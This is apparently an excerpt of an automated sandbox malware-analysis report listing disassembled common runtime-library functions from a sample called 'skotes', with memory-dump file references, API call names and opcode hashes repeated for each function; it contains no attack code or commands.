                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                              • Opcode ID: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
                                                                                                                                              • Instruction ID: 8ea58e001adf984e7c012f60bfadf62abbd4b5fd5d949d96f5012e2c2c88c0a4
                                                                                                                                              • Opcode Fuzzy Hash: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
                                                                                                                                              • Instruction Fuzzy Hash: 08216275A00219AFDF00EFA5CC819FEB7B9EF08714F10006AF601B7291DB389D419BA5
                                                                                                                                              Function 00429C95 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00429C9C
                                                                                                                                              • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00429CE8
                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00429CFE
                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00429D6A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2033596534-0
                                                                                                                                              • Opcode ID: d5acf91e69b33f76441d518a4b4449b03275e723d49f236a958158d73a3ed043
                                                                                                                                              • Instruction ID: e4f0000fdf8db68e5cd6af660122ebbf79e84cae44bb9f1680ea774d3ebdc29a
                                                                                                                                              • Opcode Fuzzy Hash: d5acf91e69b33f76441d518a4b4449b03275e723d49f236a958158d73a3ed043
                                                                                                                                              • Instruction Fuzzy Hash: 7F21C471A001249FCB04EF65E4829DEB7B0AF05314FA0406BF401AB2A2DB396D45DB69
                                                                                                                                              Function 0042A026 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A069
                                                                                                                                                • Part of subcall function 0042B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0042B5AF
                                                                                                                                              • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A07F
                                                                                                                                              • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 0042A0CB
                                                                                                                                                • Part of subcall function 0042AB41: List.LIBCONCRT ref: 0042AB77
                                                                                                                                              • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 0042A0DB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 932774601-0
                                                                                                                                              • Opcode ID: 386fd577828921938e71a6797082d4329d7b43a5143f3f4dd254a7469bd44dd8
                                                                                                                                              • Instruction ID: aee70dd77bb51db2fd3432b00035324ccbacf7c2396e796ad22a8847a71e431e
                                                                                                                                              • Opcode Fuzzy Hash: 386fd577828921938e71a6797082d4329d7b43a5143f3f4dd254a7469bd44dd8
                                                                                                                                              • Instruction Fuzzy Hash: 8921F131600B249FCB24EF66E9908ABF3F5FF48304740455EE942A7651CB38F805CB9A
                                                                                                                                              Function 00424885 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ListArray.LIBCONCRT ref: 00424893
                                                                                                                                              • ListArray.LIBCONCRT ref: 004248A5
                                                                                                                                                • Part of subcall function 00425555: _InternalDeleteHelper.LIBCONCRT ref: 00425564
                                                                                                                                              • ListArray.LIBCONCRT ref: 004248AF
                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 004248C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
